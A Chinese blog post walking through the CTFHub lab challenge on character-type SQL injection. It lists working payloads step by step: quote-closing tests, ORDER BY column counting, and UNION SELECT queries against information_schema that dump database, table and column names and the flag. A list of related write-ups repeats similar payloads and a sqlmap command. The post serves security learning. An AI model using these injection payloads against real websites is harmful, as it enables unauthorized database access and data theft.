CTFHUB-技能树-Web题-SQL注入-字符型注入

Web题字符型SQL注入详解
原创 已于 2024-05-09 21:15:10 修改 · 728 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #sql #数据库 #web安全

于 2024-03-29 19:43:48 首次发布
博客围绕Web题中的字符型SQL注入展开,介绍了判断注入点、字段数、回显字段的方法,还提及爆库名、表名、列名和数据等操作,属于Web安全和数据库相关内容。

技能树-Web题-SQL注入-字符型注入

文章目录

字符型注入
判断注入点

对于字符型注入,可在url中输入

1' and 1=1 --+ 有回显

需要让语句闭合,正常执行,在url结尾输入%23 或者--+,正常闭合,%23为#,注释后面的语句,一定要注意“ ' ”英文输入下,否则容易爆错

在这里插入图片描述

1' and 1=2 --+ 无回显

在这里插入图片描述

由此判断此为注入点

判断字段数
1' order by 3 --+ 无回显

在这里插入图片描述

1' order by 2--+ 有回显

在这里插入图片描述

由此判断字段数为两个

判断回显字段
-1' union select 1,2 --+

在这里插入图片描述

由此判断回显字段为1,2字段

爆库名
-1’ union select user(),database() --+

在这里插入图片描述

爆表名
-1' union select user(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

在这里插入图片描述

爆列名
-1' union select user(),group_concat(column_name) from information_schema.columns where table_name='flag' --+

在这里插入图片描述

爆数据
-1' union select 1,flag from flag --+

在这里插入图片描述

ctfhubSQL注入字符型注入
manerzi的博客
10-05 498
SQL注入字符型注入
CTFHub | 字符型注入
尼泊罗河伯的博客
10-27 1718
目和上一相似,一个是整数型注入,一个是字符型注入字符型注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一使用手工注入查看目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成。
CTFHub - 字符型注入
Have_a_great_day的博客
09-08 1255
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHub:web前置技能-SQL注入-整数型注入
最新发布
wdnmddbl的博客
06-08 1184
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:sql注入之数字型注入点:许多网页链接有类似的结构。
CTFHub 字符型SQL注入
Leon~博客
03-14 4837
字符型SQL注入 目录 一、判断是否存在注入 二、判断select语句中有几列 三、判断显示的信息是第几列的信息 四、利用函数来收集数据库信息 五、通过union查询数据库 1、获取所有数据库名称 2、查询数据库中有多少个表 3、查询指定数据库中的表名 4、查询指定数据库指定表中的列名 5、查询指定...
CTFHUB-技能树-WEB-SQL注入
慢就是快
04-16 649
文章目录1.整数型注入2.字符型注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数型注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示 id=-1 union select 1,group_concat(s
解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2652
数据库注入
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1068
CTFHUB SQL
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7979
Web 目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
ctfhub技能树 web sql注入
m0_62207170的博客
04-16 556
ctfhub技能树 web sql注入
CTFHUB-SQL字符型注入
Web学习之路
03-07 418
很简单的,用心
CTFHub技能树-Web-SQL注入-字符型注入
qq_46222050的博客
09-02 600
这个目我使用的sqlmap做的,需要python环境的支持。 sqlmap安装教程,点击跳转。 1.我们打开环境。 2.使用sqlmap获取当前网站数据库的名称 sqlmap.py -u "http://challenge-360c6b5a7e81662d.sandbox.ctfhub.com:10080/b.com:10080/?id=1" --current-db 3.获取sqli数据库中的表名 发现flag表 4.获取flag表中的字段名 发现flag字段 5.获取flag字段的内容 得到f
CTFHUB-WEB-SQL注入-字符型注入
weixin_43486981的博客
08-10 539
目: 靶机环境: 输入1查看显示,1被单引号引起来了 使用单引号’,提前闭合字符 求列数 求数据库名 求数据表名 求字段名 求字段值,得到flag
CTFHub | webSQL注入字符型注入
2301_76435948的博客
09-26 483
如果满足以上三点,可以判断该url为字符型注入。服务端的sql语句为:select 列 from 数据库.表 where name=‘$name’
CTFHub笔记之技能树WEB-字符型注入
weixin_48799157的博客
03-19 448
小白一个,如有错误还请各位大佬指正! 解法一:手搓 1.输入1和2都有回显,3没有回显,得知数据库只有两个字段。开始构造payload,暴个数据库看看 123' union select 1,database()# 2.发现目标 爆个表名看看 123' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli' #' 3.发现名为flag的表 冲啦兄.
CTFHub技能树web(持续更新)--SQL注入--字符型注入
jiuyongpinyin的博客
08-12 564
字符型注入 这道和上一道基本一样,而且很简单,因为是有回显的,知道是拿什么字符包裹的语句,就知道拿什么字符使语句闭合,例如这道: 我们截断语句之后,回显发现是使用单引号包裹的语句,所以我们使用单引号来使语句闭合,使用order by 语句来查列: ?id=1' order by 2 --+ 查看是否可以使用联合查询语句: ?id=111' union select 1,2 --+ 查看数据库: ?id=111' union select 1,database()--+ 查看列: ?id=
ctfhub-技能树-Web-SQL注入-字符型注入
tmyzxy1314的博客
05-14 483
先查询以下数据库基本信息 version() user() database()先查询以下数据库基本信息 version() user() database()既然是靶场,那么验证是否存在sql注入的步骤直接省略。既然是靶场,那么验证是否存在sql注入的步骤直接省略。直接order by 查询字段数。直接order by 查询字段数。Sqli数据库下有两个表。不用看了肯定是flag表。不用看了肯定是flag表。当前数据库sqli。当前数据库sqli。
SQL 字符型注入ctfhub
m0_63563528的博客
12-08 322
字符型注入ctfhub
CTFHUB技能树SQL注入整数型和字符型注入
PigletTT的博客
07-03 1645
CTFHUB 技能树SQL注入整数型 一、关键词和过程 1.关键词解释 关键字/语句/函数的解释 union select //联合查询,联合注入常用 database() //回显当前连接的数据库名称 version() //查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() //把产生的同一分组中的值用,连接,形成一个字符串 information_schema //存了很多mysql信息的数据库 information_schema
PHP在CTF-Web挑战中的实战应用技巧
和描述中提到的知识点是关于在Web环境中使用PHP编程语言进行CTF(Capture The Flag)挑战的介绍。...在CTF-Web-Challenge的环境中,参赛者将有机会通过实战演练这些技术,提升自己的安全技能。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值